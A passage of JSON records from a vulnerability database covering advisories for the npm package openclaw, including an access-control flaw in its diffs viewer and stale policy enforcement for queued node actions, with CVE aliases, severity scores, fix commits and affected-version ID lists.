"VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41339", "GHSA-2f7j-rp58-mr42" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w58d-6veg-uugy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90188?format=api", "vulnerability_id": "VCID-watb-49vx-yub1", "summary": "OpenClaw: diffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n## Summary\ndiffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 misclassified proxied diff-viewer requests as local loopback in some cases, a real but low-severity access-control flaw.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `30a1690323088fd291abd11643a264a6828a002c` — 2026-03-30T14:17:27-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41403", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19093", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19134", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19137", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41403" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41403", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41403" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification" }, { "reference_url": "https://github.com/advisories/GHSA-3xv9-89fm-7h4r", "reference_id": "GHSA-3xv9-89fm-7h4r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3xv9-89fm-7h4r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41403", "GHSA-3xv9-89fm-7h4r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-watb-49vx-yub1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91185?format=api", "vulnerability_id": "VCID-wfkm-7ayk-uuhb", "summary": "OpenClaw may have stale policy enforcement for queued node actions\n## Summary\nQueued node actions were not revalidated against current command policy when later delivered, so stale allowlists or declarations could survive policy tightening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server-methods/nodes.ts now revalidates queued actions against the current allowlist and declared command set at delivery time.\n- src/gateway/server-methods/nodes.invoke-wake.test.ts includes the shipped stale-queue regression coverage.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35648", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10859", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10896", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10907", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35648" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35648", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35648" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions" }, { "reference_url": "https://github.com/advisories/GHSA-wj55-88gf-x564", "reference_id": "GHSA-wj55-88gf-x564", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wj55-88gf-x564" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" 